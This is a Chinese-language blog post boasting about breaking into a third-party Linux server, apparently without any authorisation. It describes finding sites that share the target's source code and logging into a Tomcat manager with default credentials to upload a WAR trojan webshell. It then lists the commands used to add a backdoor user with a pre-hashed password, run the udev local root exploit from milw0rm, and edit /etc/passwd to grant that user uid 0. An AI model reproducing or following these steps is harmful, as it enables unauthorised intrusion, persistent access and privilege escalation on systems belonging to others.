今天成功利用udev搞定一個linux肉雞，爽呀，沒想到我的人品已經好到這個地步了……

今天本來和ay520一起檢測一個網站的，無奈網站太過去強大，沒有發現漏洞，于是我就開始了迂回攻擊戰術，什么是迂回攻擊？我就來小介紹一下：

通常我們攻擊一個網站的時候，由于不了解網站源碼結構，也沒有常見的漏洞，我們就可以先找出這個網站源碼的一些特征字符，然后利用google搜索

和這個網站一樣源碼的站，要攻擊的站可能沒有漏洞，但是我們搜索到的站不一定沒有漏洞，可能是配置上面的問題等，然后加以利用，成功得到shell以后

我們就可以利用shell來查看網站的源碼，然后再返回去攻擊目標站點，這樣就是我所謂的迂回了，當然也可以是社工網站管理員在其它網站或者是論壇上面的

注冊用戶名和密碼然后再回來測試目標站點，最終拿下目標站點就OK了。費話不多說了，下面就開始我今天的入侵滲透之旅了……

由于目標站點沒有漏洞，配置上面的漏洞也沒有，通過google搜索我找到一個和他一樣源碼的網站http://www.xxx.com:9999/wcm/loginpage.htm 然后進行了常用密碼的

猜解，但是也沒有發現弱密碼等漏洞，于是去掉wcm以及后面的，直接http://www.xxx.com:9999/ 結果發現是tomcat ，經測試用戶名和密碼為：admin/null 成功進入以

后上傳war木馬，最后得到迂回攻擊的網站的webshell 運行命令uname -a 得到服務器的內核版本Linux www.xxx.com 2.6.18-

128.el5 #1 SMP Wed Jan 21 10:44:23 EST 2009 i686 i686 i386 GNU/Linux 由于linux的2.6內核出了一個udev本地溢出漏洞，首先看一下webshell的運行權限，命令

id，結果人品爆發了uid=0（root） gid=0（root） groups=0（root），1（bin），2（daemon），3（sys），4（adm），6（disk），10（wheel） context=user_u:system_r:unconfined_t，是root權

限，既然是root權限，那么我們可以通過webshell來建立一個用戶，然后利用putty來連接，進行本地溢出提權……但是通過常用的useradd username添加的用戶密碼

為空，如果想利用passwd username來設置密碼的話，我們的webshell是無法輸入密碼的，我們就郁悶使用他的參數，-p來操作了，結果搜索運行如下命令：useradd -

p $1$Bj.BPMBM$pr3Vte2A9DW6jCzljcZNT1 liang    //-p 后面的一串字符串是我在虛擬機中添加用戶，然后復制他的密碼來做為這里的密碼，這樣我就成功添加一個用

戶liang 打開putty  然后輸入用戶名和密碼，連接，一切ok，權限為$ 為普通用戶，下面就利用udev的溢出來進行提權了。

我本來按照此文所寫來進行溢出  http://www.waitalone.cn/post/466.html  結果不成功，經查實，可能是溢出代碼有問題，于是我就直接打開

http://www.milw0rm.com/exploits/8478  在putty中運行如下命令：

[liang@www ~]$ vi  test     粘貼上面的代碼

[liang@www ~]$ wq 保存并退出

[liang@www ~]$chmod 777 test  添加任意用戶可執行權限

[liang@www ~]$ps ax|grep udev|grep -v grep|awk {'print $1'}     獲得udev進程號，結果為479，然后減1作為test參數

[liang@www ~]$sh test 478  結果返回

sh-3.2$  返回這個說明不成功，我們多試幾次

sh-3.2$ sh test 478 這樣我試了三次，還是不行

sh-3.2$ sh test 476 這次成功了，我看到了可愛的#，哈哈 人品爆炸了

然后vi /etc/passwd  把用戶名liang的 uid和gid改為0，這樣liang 就為root 權限了，哈哈。搞定收工！